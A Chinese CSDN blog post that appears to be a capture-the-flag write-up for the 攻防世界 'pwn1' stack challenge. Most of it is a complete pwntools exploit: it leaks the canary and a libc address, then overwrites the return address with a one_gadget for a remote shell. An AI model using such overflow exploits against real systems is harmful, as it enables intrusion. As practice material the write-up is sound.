pwn--攻防世界 pwn1

于 2024-04-04 21:12:24 发布
阅读量424 收藏 1
点赞数 10
文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A13837377363/article/details/137382292
版权

此题的难度不高,但过程和思考有纪念价值。

观察保护和源码,有canary保护,并且只能溢出8字节,也就是一个地址。

思路形成:先读出canary,再读出main函数的返回地址,计算出libc的基址,因为只能填入一个地址,所以就想到one_gadget。

首先是读出canary:

gdb调试发现,canary正好在rsp上方。

io.recvuntil(b">> ")

io.sendline(b'1')

#canary 

payload=b'a'*0x88

io.sendline(payload)

io.recvuntil(b">> ")

io.sendline(b'2')

io.recvuntil(b'\n')

canary=u64(io.recv(7).rjust(0x8,b'\x00'))

print('canary:',hex(canary))

这是读出canary的脚本,解释一下:

canary一般是以'\x00'结尾,但是由于小端序存储,我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。

然后是读取main函数的返回地址,与这个类似,就不赘述。

接下来是重点,我们要确定main返回地址与libc基址的偏移。题目提供给我们libc-2.23.so,但是我多次尝试修改babystack的libc都失败了。

这里就要推荐:

https://github.com/tower111/pwn-change-libc/?tab=readme-ov-file

一个非常便捷的工具。

我使用的是python3,可能由于python版本问题,我运行的时候要将

get_env.py 中的 ./update_list 改为 python3 update_list

最后修改指向成功,通过gdb得到偏移,用one_gadget工具得到one_gadget。

以下是完整代码:

from pwn import *

context.arch='amd64'

io=remote('61.147.171.105',52496)

libc=ELF('./libc-2.23.so')

one_gadget=0x45216

io.recvuntil(b">> ")

io.sendline(b'1')

#canary 

payload=b'a'*0x88

io.sendline(payload)

io.recvuntil(b">> ")

io.sendline(b'2')

io.recvuntil(b'\n')

canary=u64(io.recv(7).rjust(0x8,b'\x00'))

print('canary:',hex(canary))

io.recvuntil(b">> ")

io.sendline(b'1')

payload=b'a'*0x97

io.sendline(payload)

io.recvuntil(b">> ")

io.sendline(b'2')

libc_ret=u64(io.recvuntil(b'\x7f')[-6:].ljust(0x8,b'\x00'))

print('libc_ret:',hex(libc_ret))

libc_base=libc_ret-240-libc.sym['__libc_start_main']

one_gadget+=libc_base

io.recvuntil(b">> ")

io.sendline(b'1')

payload=b'\x00'*0x88+p64(canary)+b'a'*0x8+p64(one_gadget)

io.send(payload)

io.recvuntil(b">> ")

io.sendline(b'3')

io.interactive()

奇怪的轩轩
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc
pwn攻防世界 pwn新手区wp
woodwhale的博客
08-10 7181
pwn攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
什么是私有地址?如何分类?
热门推荐
qq_44047479的博客
10-30 2万+
什么是私有地址?如何分类? 在现在的网络中,IP地址分为公网IP地址和私有IP地址。 公网IP是在Internet使用的IP地址,而私有IP地址则是在局域网中使用的IP地址。 私有IP地址是一段保留的IP地址。只使用在局域网中,无法在Internet上使用。 当私有网络内的主机要与位于公网上的主机进行通讯时必须经过地址转换,将其私有地址转换为合法公网地址才能对外访问。 NAT-Network Address Translation 网络地址转换 所谓的私有地址就是在互联网上不使用,而被用在局域网络中的地址
攻防世界 pwn-100
weixin_56777139的博客
03-20 320
此处有一处值得一提,发送payload时注意sendline和send,sendline会自动在200个字符后加’\n’,缓冲区内则为200个字符加’\n’的形式,当复制200个字符串后返回主函数地址,缓冲区内还有’\n’,而主函数没有刷新缓冲区,所以返回主函数后进入下一轮的复制函数会将缓冲区头部的’\n’复制到内存中。构造新的payload,注意上述说的sendline和send对于此处的影响,若之前处用的sendline,那此处b’a’数量为0x48-1=0x47即可。此时即可接收泄露的内容。
PWN刷题】Pwnable-hacknote
QYbudong的博客
05-06 387
回顾经典老题。一、
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1318
学习pwn开始,慢慢来不要急
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 551
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3612
攻防世界-Pwn-new-easypwn
攻防世界 pwn
清霂的博客
02-02 629
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
攻防世界pwn(warmup&welpwn)
song_10的博客
05-21 436
攻防世界pwn题题解记录
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
攻防世界pwn题:forgot.doc
07-13
攻防世界pwn题:forgot.doc
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
首届数字空间安全攻防大赛
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
攻防世界 pwnstack writeup
m0_73605862的博客
05-30 805
Step5:shift+F12查看字符串发现/bin/sh,进入发现后门函数,查看地址(ctr+x)发现为:0x400762。Step6:编写exp,输入后,ls查看文件,然后发现有一个叫flag的文件,cat查看文件,得到flag。【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list。Step4:进入vuln()函数查看一下,发现有一个buf,查看发现从0xA0到0x08。Step3:发现main函数,f5查看伪代码(如果键被占用,fn+f5)。
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2004
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 171
做题记录
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值